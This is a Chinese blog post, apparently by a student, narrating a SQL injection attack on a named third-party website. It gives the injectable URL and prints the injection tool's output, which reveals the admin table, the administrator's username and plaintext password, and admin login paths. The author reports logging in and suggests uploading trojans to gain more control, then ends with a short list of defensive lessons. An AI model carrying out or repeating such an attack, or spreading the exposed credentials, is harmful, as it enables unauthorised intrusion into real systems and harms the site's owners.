这几天为了毕业设计要做的学生处系统安全的问题在学习SQL注入
实际演练了一下(只为测试,请勿模仿或者用文中方法攻击破坏!)
第一,找目标,比如:
http://www.yldn.com/happy/
http://skyhe.com/down/pic/SQL_yldn1.jpg
首先,用ASC进行站点分析:
http://skyhe.com/down/pic/SQL_yldn6.jpg获得可注入的链接
http://www.yldn.com/happy/sort.asp?classid=1
然后使用SQL注入工具进行注入、猜测、破解
http://skyhe.com/down/pic/SQL_yldn5.jpg这里是破解过程和结果:
********************************************************
存在漏洞,以数值型方式注入开始!
可能存在 http://www.yldn.com/happy/admin
可能存在 http://www.yldn.com/happy/admin/index.asp
可能存在 http://www.yldn.com/happy/admin/manage.asp
可能存在 http://www.yldn.com/happy/../admin.asp
存在表 admin
存在账号字段 username
存在密码字段 password
用户名长度为 6位
密码长度为 8位
账号第1位是 z
账号第2位是 h
账号第3位是 p
账号第4位是 a
账号第5位是 y
账号第6位是 y
管理员名为 zhpayy
密码第1位是 6
密码第2位是 6
密码第3位是 3
密码第4位是 7
密码第5位是 1
密码第6位是 1
密码第7位是 4
密码第8位是 8
管理员密码为:66371148
所有检查完毕,请勿非法利用此结果信息!
*******************************************************
用http://www.yldn.com/happy/admin/index.asp登陆管理员入口:
http://skyhe.com/down/pic/SQL_yldn2.jpg哦哦!进来了!~~~
嘿嘿,如果想拿到更大的权限可以上传些木马!
我在这里就不多说了!
http://skyhe.com/down/pic/SQL_yldn3.jpghttp://skyhe.com/down/pic/SQL_yldn4.jpg
kittow总结:
经过这次破解实战,我认识到网站安全要做到以下几点:
1、替换所有的返回参数、不论数值还是字符,杜绝SQL注入漏洞
2、管理员表一定不能用常见的admin之类
3、管理员密码一定要MD5加密,防止破解
4、数据库进行防下载处理
5、服务器端安全设置要充分,防止ASP木马等脚本木马的上传运行
又UP UP UP~~~!!!^0^
当前评分 2.6 , 共有 7 人参与
- Currently 2.571429/5 Stars.
- 1
- 2
- 3
- 4
- 5